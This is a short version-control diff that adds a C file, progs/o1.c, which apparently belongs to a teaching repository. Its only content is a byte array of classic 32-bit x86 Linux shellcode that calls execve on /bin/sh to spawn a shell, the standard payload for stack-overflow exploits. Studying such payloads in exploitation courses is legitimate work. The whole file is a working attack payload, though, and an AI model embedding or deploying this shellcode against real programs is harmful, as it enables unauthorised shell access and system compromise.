changeset 400 | f05368d007dd |
--- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/o1.c Thu Oct 08 12:08:10 2015 +0100 @@ -0,0 +1,5 @@ +char shellcode[] = + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" + "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" + "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" + "\xff\xff/bin/sh"; \ No newline at end of file